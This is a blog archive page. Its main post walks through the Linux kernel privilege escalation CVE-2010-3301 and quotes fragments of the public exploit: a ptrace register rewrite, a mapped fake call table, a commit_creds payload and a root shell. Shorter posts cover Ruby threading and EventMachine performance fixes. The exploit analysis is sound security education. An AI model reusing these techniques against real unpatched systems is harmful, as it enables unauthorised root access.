time to bleed by Joe Damato

technical ramblings from a wanna-be unix dinosaur

Archive for the ‘bugfix’ tag

detailed explanation of a recent privilege escalation bug in linux (CVE-2010-3301)

View Comments


If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

tl;dr

This article is going to explain how a recent privilege escalation exploit for the Linux kernel works. I’ll explain what the deal is from the kernel side and the exploit side.

This article is long and technical; prepare yourself.

ia32 syscall emulation

There are two ways to invoke system calls on the Intel/AMD family of processors:

  1. Software interrupt 0x80.
  2. The sysenter family of instructions.

The sysenter family of instructions are a faster syscall interface than the traditional int 0x80 interface, but aren’t available on some older 32bit Intel CPUs.

The Linux kernel has a layer of code to allow syscalls executed via int 0x80 to work on newer kernels. When a system call is invoked with int 0x80, the kernel rearranges state to pass off execution to the desired system call thus maintaing support for this older system call interface.

This code can be found at http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L380. We will examine this code much more closely very soon.

ptrace(2) and the ia32 syscall emulation layer

From the ptrace(2) man page (emphasis mine):

The ptrace() system call provides a means by which a parent process may observe and control the execution of another process, and examine and change its core image and registers. It is primarily used to implement break-point debugging and system call tracing.

If we examine the IA32 syscall emulation code we see some code in place to support ptrace1:

ENTRY(ia32_syscall)
/* . . . */
        GET_THREAD_INFO(%r10)
          orl $TS_COMPAT,TI_status(%r10)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
        jnz ia32_tracesys

This code is placing a pointer to the thread control block (TCB) into the register r10 and then checking if ptrace is listening for system call notifications. If it is, a secondary code path is entered.

Let’s take a look2:

ia32_tracesys:
        /* . . . */
        call syscall_trace_enter
        LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
        RESTORE_REST
        cmpl $(IA32_NR_syscalls-1),%eax
        ja  int_ret_from_sys_call       /* ia32_tracesys has set RAX(%rsp) */
        jmp ia32_do_call
END(ia32_syscall)

Notice the LOAD_ARGS32 macro and comment above. That macro reloads register values after the ptrace syscall notification has fired. This is really fucking important because the userland parent process listening for ptrace notifications may have modified the registers which were loaded with data to correctly invoke a desired system call. It is crucial that these register values are untouched to ensure that the system call is invoked correctly.

Also take note of the sanity check for %eax: cmpl $(IA32_NR_syscalls-1),%eax

This check is ensuring that the value in %eax is less than or equal to (number of syscalls – 1). If it is, it executes ia32_do_call.

Let’s take a look at the LOAD_ARGS32 macro3:

.macro LOAD_ARGS32 offset, _r9=0
/* . . . */
movl \offset+40(%rsp),%ecx
movl \offset+48(%rsp),%edx
movl \offset+56(%rsp),%esi
movl \offset+64(%rsp),%edi
.endm

Notice that the register %eax is left untouched by this macro, even after the ptrace parent process has had a chance to modify its contents.

Let’s take a look at ia32_do_call which actually transfers execution to the system call4:

ia32_do_call:
        IA32_ARG_FIXUP
        call *ia32_sys_call_table(,%rax,8) # xxx: rip relative

The system call invocation code is calling the function whose address is stored at ia32_sys_call_table[8 * %rax]. That is, the (8 * %rax)th entry in the ia32_sys_call_table.

subtle bug leads to sexy exploit

This bug was originally discovered by the polish hacker “cliph” in 2007, fixed, but then reintroduced accidentally in early 2008.

The exploit is made by possible by three key things:

  1. The register %eax is not touched in the LOAD_ARGS macro and can be set to any arbitrary value by a call to ptrace.
  2. The ia32_do_call uses %rax, not %eax, when indexing into the ia32_sys_call_table.
  3. The %eax check (cmpl $(IA32_NR_syscalls-1),%eax) in ia32_tracesys only checks %eax. Any bits in the upper 32bits of %rax will be ignored by this check.

These three stars align and allow an attacker cause an integer overflow in ia32_do_call causing the kernel to hand off execution to an arbitrary address.

Damnnnnn, that’s hot.

the exploit, step by step

The exploit code is available here and was written by Ben Hawkes and others.

The exploit begins execution by forking and executing two copies of itself:

        if ( (pid = fork()) == 0) {
                ptrace(PTRACE_TRACEME, 0, 0, 0);
                execl(argv[0], argv[0], "2", "3", "4", NULL);
                perror("exec fault");
                exit(1);
        }

The child process is set up to be traced with ptrace by setting the PTRACE_TRACEME.

The parent process enters a loop:

        for (;;) {
                if (wait(&status) != pid)
                        continue;

                /* ... */

                rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
                if (rax == 0x000000000101) {
                        if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
                                printf("PTRACE_POKEUSER fault\n");
                                exit(1);
                        }
                        set = 1;
                }

                /* ... */

                if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
                        printf("PTRACE_SYSCALL fault\n");
                        exit(1);
                }
         }

The parents calls wait and blocks until entry into a system call. When a system call is entered, ptrace is invoked to read the value of the rax register. If the value is 0x101, ptrace is invoked to set the value of rax to 0x800000101 to cause an overflow as we’ll see shortly. ptrace is then invoked to resume execution in the child.

While this is happening, the child process is executing. It begins by looking the address of two symbols in the kernel:

	commit_creds = (_commit_creds) get_symbol("commit_creds");
	/* ... */

	prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
       /* ... */

Next, the child process attempts to create an anonymous memory mapping using mmap:

        if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
          /* ... */

This mapping is created at the address tmp. tmp is set earlier to: 0xffffffff80000000 + (0x0000000800000101 * 8) (stored in kern_s in main).

This value actually causes an overflow, and wraps around to: 0x3f80000808. mmap only creates mappings on page-aligned addresses, so the mapping is created at: 0x3f80000000. This mapping is 64 megabytes large (stored in size).

Next, the child process writes the address of a function called kernelmodecode which makes use of the symbols commit_creds and prepare_kernel_cred which were looked up earlier:

int kernelmodecode(void *file, void *vma)
{
	commit_creds(prepare_kernel_cred(0));
	return -1;
}

The address of that function is written over and over to the 64mb memory that was mapped in:

        for (; (uint64_t) ptr < (tmp + size); ptr++)
                *ptr = (uint64_t)kernelmodecode;

Finally, the child process executes syscall number 0x101 and then executes a shell after the system call returns:

        __asm__("\n"
        "\tmovq $0x101, %rax\n"
        "\tint $0x80\n");

        /* . . . */
        execl("/bin/sh", "bin/sh", NULL);

tying it all together

When system call 0x101 is executed, the parent process (described above) receives a notification that a system call is being entered. The parent process then sets rax to a value which will cause an overflow: 0x800000101 and resumes execution in the child.

The child executes the erroneous check described above:

        cmpl $(IA32_NR_syscalls-1),%eax
        ja  int_ret_from_sys_call       /* ia32_tracesys has set RAX(%rsp) */
        jmp ia32_do_call

Which succeeds, because it is only comparing the lower 32bits of rax (0x101) to IA32_NR_syscalls-1.

Next, execution continues to ia32_do_call, which causes an overflow, since rax contains a very large value.

call *ia32_sys_call_table(,%rax,8)

Instead of calling the function whose address is stored in the ia32_sys_call_table, the address is pulled from the memory the child process mapped in, which contains the address of the function kernelmodecode.

kernelmodecode is part of the exploit, but the kernel has access to the entire address space and is free to begin executing code wherever it chooses. As a result, kernelmodecode executes in kernel mode setting the privilege level of the process to those of init.

The system has been rooted.

The fix

The fix is to zero the upper half of eax and change the comparison to examine the entire register. You can see the diffs of the fix here and here.

Conclusions

  • Reading exploit code is fun. Sometimes you find particularly sexy exploits like this one.
  • The IA32 syscall emulation layer is, in general, pretty wild. I would not be surprised if more bugs are discovered in this section of the kernel.
  • Code reviews play a really important part of overall security for the Linux kernel, but subtle bugs like this are very difficult to catch via code review.
  • I'm not a Ruby programmer.

If you enjoyed this article, subscribe (via RSS or e-mail) and follow me on twitter.

References

  1. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L424 []
  2. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L439 []
  3. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L50 []
  4. http://lxr.linux.no/linux+v2.6.35/arch/x86/ia32/ia32entry.S#L430 []

Written by Joe Damato

September 27th, 2010 at 4:59 am

Debugging Ruby: Understanding and Troubleshooting the VM and your Application

View Comments

Download the PDF here.

Debugging Ruby

Written by Aman Gupta

December 2nd, 2009 at 8:30 pm

Ruby Hoedown Slides

View Comments

Below are the slides for a talk that Aman Gupta and I gave at Ruby Hoedown

Download the PDF here

Thanks for reading and don’t forget to subscribe (via RSS or e-mail) and follow me on twitter.

Written by Joe Damato

August 29th, 2009 at 1:05 am

Fix a bug in Ruby’s configure.in and get a ~30% performance boost.

View Comments


Special thanks…

Going out to Jake Douglas for pushing the initial investigation and getting the ball rolling.

The whole --enable-pthread thing

Ask any Ruby hacker how to easily increase performance in a threaded Ruby application and they’ll probably tell you:

Yo dude… Everyone knows you need to configure Ruby with --disable-pthread.

And it’s true; configure Ruby with --disable-pthread and you get a ~30% performance boost. But… why?

For this, we’ll have to turn to our handy tool strace. We’ll also need a simple Ruby program to this one. How about something like this:

def make_thread
  Thread.new {
    a = []
    10_000_000.times {
      a << "a"
      a.pop
    }
  }
end

t = make_thread
t1 = make_thread 

t.join
t1.join

Now, let's run strace on a version of Ruby configure'd with --enable-pthread and point it at our test script. The output from strace looks like this:

22:46:16.706136 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706177 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706218 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706259 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000005>
22:46:16.706301 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706342 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706383 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706425 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>
22:46:16.706466 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000004>

Pages and pages and pages of sigprocmask system calls (Actually, running with strace -c, I get about 20,054,180 calls to sigprocmask, WOW). Running the same test script against a Ruby built with --disable-pthread and the output does not have pages and pages of sigprocmask calls (only 3 times, a HUGE reduction).

OK, so let's just set a breakpoint in GDB... right?

OK, so we should just be able to set a breakpoint on sigprocmask and figure out who is calling it.

Well, not exactly. You can try it, but the breakpoint won't trigger (we'll see why a little bit later).

Hrm, that kinda sucks and is confusing. This will make it harder to track down who is calling sigprocmask in the threaded case.

Well, we know that when you run configure the script creates a config.h with a bunch of defines that Ruby uses to decide which functions to use for what. So let's compare ./configure --enable-pthread with ./configure --disable-pthread:

[joe@mawu:/home/joe/ruby]% diff config.h config.h.pthread
> #define _REENTRANT 1
> #define _THREAD_SAFE 1
> #define HAVE_LIBPTHREAD 1
> #define HAVE_NANOSLEEP 1
> #define HAVE_GETCONTEXT 1
> #define HAVE_SETCONTEXT 1


OK, now if we grep the Ruby source code, we see that whenever HAVE_[SG]ETCONTEXT are set, Ruby uses the system calls setcontext() and getcontext() to save and restore state for context switching and for exception handling (via the EXEC_TAG).

What about when HAVE_[SG]ETCONTEXT are not define'd? Well in that case, Ruby uses _setjmp/_longjmp.

Bingo!

That's what's going on! From the _setjmp/_longjmp man page:

... The _longjmp() and _setjmp() functions shall be equivalent to longjmp() and setjmp(), respectively, with the additional restriction that _longjmp() and _setjmp() shall not manipulate the signal mask...

And from the [sg]etcontext man page:

... uc_sigmask is the set of signals blocked in this context (see sigprocmask(2)) ...


The issue is that getcontext calls sigprocmask on every invocation but _setjmp does not.

BUT WAIT if that's true why didn't GDB hit a sigprocmask breakpoint before?

x86_64 assembly FTW, again

Let's fire up gdb and figure out this breakpoint-not-breaking thing. First, let's start by disassembling getcontext (snipped for brevity):

(gdb) p getcontext
$1 = {} 0x7ffff7825100
(gdb) disas getcontext
...
0x00007ffff782517f : mov $0xe,%rax
0x00007ffff7825186 : syscall
...

Yeah, that's pretty weird. I'll explain why in a minute, but let's look at the disassembly of sigprocmask first:

(gdb) p sigprocmask
$2 = {} 0x7ffff7817340 <__sigprocmask>
(gdb) disas sigprocmask
...
0x00007ffff7817383 <__sigprocmask+67>: mov $0xe,%rax
0x00007ffff7817388 <__sigprocmask+72>: syscall
...

Yeah, this is a bit confusing, but here's the deal.

Recent Linux kernels implement a shiny new method for calling system calls called sysenter/sysexit. This new way was created because the old way (int $0x80) turned out to be pretty slow. So Intel created some new instructions to execute system calls without such huge overhead.

All you need to know right now (I'll try to blog more about this in the future) is that the %rax register holds the system call number. The syscall instruction transfers control to the kernel and the kernel figures out which syscall you wanted by checking the value in %rax. Let's just make sure that sigprocmask is actually 0xe:

[joe@pluto:/usr/include]% grep -Hrn "sigprocmask" asm-x86_64/unistd.h
asm-x86_64/unistd.h:44:#define __NR_rt_sigprocmask                     14


Bingo. It's calling sigprocmask (albeit a bit obscurely).

OK, so getcontext isn't calling sigprocmask directly, instead it replicates a bunch of code that sigprocmask has in its function body. That's why we didn't hit the sigprocmask breakpoint; GDB was going to break if you landed on the address 0x7ffff7817340 but you didn't.

Instead, getcontext reimplements the wrapper code for sigprocmask itself and GDB is none the wiser.

Mystery solved.

The patch

Get it HERE

The patch works by adding a new configure flag called --disable-ucontext to allow you to specifically disable [sg]etcontext from being called, you use this in conjunction with --enable-pthread, like this:

./configure --disable-ucontext --enable-pthread


After you build Ruby configured like that, its performance is on par with (and sometimes slightly faster) than Ruby built with --disable-pthread for about a 30% performance boost when compared to --enable-pthread.

I added the switch because I wanted to preserve the original Ruby behavior, if you just pass --enable-pthread without --disable-ucontext Ruby will do the old thing and generate piles of sigprocmasks.

Conclusion

  1. Things aren't always what they seem - GDB may lie to you. Be careful.
  2. Use the source, Luke. Libraries can do unexpected things, debug builds of libc can help!
  3. I know I keep saying this, assembly is useful. Start learning it today!

If you enjoyed this blog post, consider subscribing (via RSS) or following (via twitter).

You'll want to stay tuned; tmm1 and I have been on a roll the past week. Lots of cool stuff coming out!

Written by Joe Damato

May 5th, 2009 at 3:20 am

6 Line EventMachine Bugfix = 2x faster GC, +1300% requests/sec

View Comments




Nothing is possible without lunch

So Aman Gupta (tmm1) and I were eating lunch at the Oaxacan Kitchen on Tuesday and as usual, we were talking about scaling Ruby. We got into a small debate about which phase of garbage collection took the most CPU time.

Aman’s claim:

  • The mark phase, specifically the stack marking phase because of the huge stack frames created by rb_eval

My claim:

  • The sweep phase, because every single object has to be touched and some freeing happens.

I told Aman that I didn’t believe the stack frames were that large, and we bet on how big we thought they would be. Couldn’t be more than a couple kilobytes, could it? Little did we know how wrong our estimates were.

Quick note about Ruby’s GC

Ruby MRI has a mark-and-sweep garbage collector. As part of the mark phase, it scans the process stack. This is required because a pointer to a Ruby object can be passed to a C extension (like Eventmachine, or Hpricot, or whatever). If that happens, it isn’t safe to free the object yet. So Ruby does a simple scan and checks if each word on the stack is a pointer to the Ruby heap, if so, that item cannot be freed.

GDB to the rescue

We get back from lunch, launch our application, attach GDB and set a breakpoint. The breakpoint gets triggered and we see this seemingly innocuous stack trace [Note: To help with debugging, we compiled the EventMachine gem with -fno-omit-frame-pointer]:

#0 0x00007ffff77629ac in epoll_wait () from /lib/libc.so.6
#1 0x00007ffff6c0b220 in EventMachine_t::_RunEpollOnce (this=0x158d7e0) at em.cpp:461
#2 0x00007ffff6c0b86c in EventMachine_t::_RunOnce (this=0x158d7e0) at em.cpp:423
#3 0x00007ffff6c0bbd6 in EventMachine_t::Run (this=0x158d7e0) at em.cpp:404
#4 0x00007ffff6c06638 in evma_run_machine () at cmain.cpp:83
#5 0x00007ffff6c1897f in t_run_machine_without_threads (self=26066936) at rubymain.cpp:154
#6 0x000000000041d598 in call_cfunc (func=0x7ffff6c1896e , recv=26066936, len=0, argc=0, argv=0x0) at eval.c:5759
#7 0x000000000041c92f in rb_call0 (klass=26065816, recv=26066936, id=29417, oid=29417, argc=0, argv=0x0, body=0x18dba10, flags=0) at eval.c:5911
#8 0x000000000041e0ad in rb_call (klass=26065816, recv=26066936, mid=29417, argc=0, argv=0x0, scope=2, self=26066936) at eval.c:6158
#9 0x00000000004160d5 in rb_eval (self=26066936, n=0x1940330) at eval.c:3514
#10 0x00000000004150b7 in rb_eval (self=26066936, n=0x1941018) at eval.c:3357
#11 0x000000000041d196 in rb_call0 (klass=26065816, recv=26066936, id=5393, oid=5393, argc=0, argv=0x0, body=0x1941018, flags=0) at eval.c:6062
#12 0x000000000041e0ad in rb_call (klass=26065816, recv=26066936, mid=5393, argc=0, argv=0x0, scope=0, self=47127864) at eval.c:6158
#13 0x0000000000415d01 in rb_eval (self=47127864, n=0x2cf5298) at eval.c:3493
#14 0x00000000004148b2 in rb_eval (self=47127864, n=0x2cf4380) at eval.c:3223
#15 0x000000000041d196 in rb_call0 (klass=47127808, recv=47127864, id=5313, oid=5313, argc=0, argv=0x0, body=0x2cf4380, flags=0) at eval.c:6062
#16 0x000000000041e0ad in rb_call (klass=47127808, recv=47127864, mid=5313, argc=0, argv=0x0, scope=0, self=9606072) at eval.c:6158
#17 0x0000000000415d01 in rb_eval (self=9606072, n=0x194b2a0) at eval.c:3493
#18 0x00000000004148b2 in rb_eval (self=9606072, n=0x19587b0) at eval.c:3223
#19 0x000000000041072c in eval_node (self=9606072, node=0x19587b0) at eval.c:1437
#20 0x0000000000410dff in ruby_exec_internal () at eval.c:1642
#21 0x0000000000410e4f in ruby_exec () at eval.c:1662
#22 0x0000000000410e72 in ruby_run () at eval.c:1672
#23 0x000000000040e78a in main (argc=3, argv=0x7fffffffebd8, envp=0x7fffffffebf8) at main.c:48

Looks pretty normal, nothing to worry about, right?

We started checking the rb_eval frames because we assumed that those would be the largest stack frames. The rb_eval function inlines other functions and call itself recursively. So how big is one of the rb_eval frames?

(gdb) frame 10
#10 0x00000000004150b7 in rb_eval (self=26066936, n=0x1941018) at eval.c:3357
3357 result = rb_eval(self, node->nd_head);
(gdb) p $rbp-$rsp
$2 = 1904

1,904 bytes – pretty large. If all the stack frames are that large, we are looking at around 47,600 bytes. Pretty serious. Let’s verify that Ruby thinks the stack is a sane size. There is a global in the Ruby interpreter called rb_gc_stack_start. It gets set when the Ruby stack is created in Init_stack(). When Ruby calculates the stack size it subtracts the current stack pointer from rb_gc_stack_start [remember on x86_64, the stack grows from high addresses to low addresses]. Let’s do that and see how big Ruby thinks the stack is.

(gdb) p (unsigned int)rb_gc_stack_start - (unsigned int)$rsp
$3 = 802688

Wait, wait, wait. 802,688 bytes with only 23 stack frames? WTF?! Something is wrong. We started at the top and checked all the rb_eval stack frames, but none of them are larger than 2kb. We did find something quite a bit larger than 2kb, though.

(gdb) frame 1
#1 0x00007ffff6c0b220 in EventMachine_t::_RunEpollOnce (this=0x158d7e0) at em.cpp:461
461 s = epoll_wait (epfd, ev, MaxEpollDescriptors, timeout == 0 ? 5 : timeout);
(gdb) p $rbp-$rsp
$28 = 786816

Uh, the RunEpollOnce stack frame is 786,816 bytes? That’s got to be wrong. WTF?

Time to bring out the big guns.

objdump + x86_64 asm FTW

I pumped EventMachine’s shared object into objdump and captured the assembly dump:

objdump -d rubyeventmachine.so > em.S

I headed down to the RunEpollOnce function and saw the following:

2f12b: 48 81 ec 78 01 0c 00 sub $0xc0178,%rsp

Interesting. So the code is moving %rsp down by 786,808 bytes to make room for something big. So, let’s see if the EventMachine code matches up with the assembly output.

struct epoll_event ev [MaxEpollDescriptors];

Where MaxEpollDescriptors = 64*1024 and sizeof(struct epoll_event) == 12. That matches up with the assembly dump and the GDB output.

Usually, doing something like that in C/C++ is (usually) OK. Avoiding the heap whenever you can is a good idea because you avoid heap-lock contention, fragmenting the heap, and memory overhead for tracking the memory region. When writing Ruby extensions, this isn’t necessarily true. Remember, Ruby’s GC algorithm scans the entire process stack searching for references to Ruby objects. This EventMachine code causes Ruby to search an extra ~800,000 bytes drastically slowing down garbage collection.

The patch

Get the patch HERE

The patch simply moves the stack allocated struct epoll_event ev to the class definition so that it is allocated on the heap when an instance of the class is created with new. This does not change the memory usage of the process at all. It just moves the object off the stack. This makes all the difference because Ruby’s GC scans the process stack and not the process heap.

On top of all that, this patch helps with Ruby’s green threads, too. If the epoll_wait causes a Ruby event to fire and that event creates a Ruby thread, that Ruby thread gets an entire copy of the existing stack. Each time that thread is switched into and out of, that thread stack has to be memcpy’d into and out of place. Reducing those memcpys by ~800,000 bytes is a HUGE performance win. Want to learn more about threading implementations? Check out my threading models post: here.

Fixing this turned out to be pretty simple. A six (6!!) line patch:

  • Speeds up GC by 2-3x because of the huge decrease in stack frame size.
  • Fixes an open bug in EventMachine where using threads with Epoll causes lots of slowness. The reason is that each thread will inherit an ~800,000 byte stack that gets copied in and out every context switch.
  • This results in an increase from 500 requests/sec to 7000 requests/sec when using Sinatra+Thin+Epoll+Threads. That is pretty ill.

Conclusion

All in all, a productive debugging session lasting about an hour. The result was a simple patch, with 2 big performance improvements.

A couple things to take away from this experience:

  • Spend time learning your debugging tools because it pays off, especially nm, objdump, and of course GDB.
  • Getting familiar with x86_64 assembly is crucial if you hope to debug complex software and optimize it correctly.

Keep your eyes open for up-coming blog posts about x86_64 assembly! Don’t forget to subscribe via RSS or follow me on twitter

Written by Joe Damato

April 29th, 2009 at 1:36 am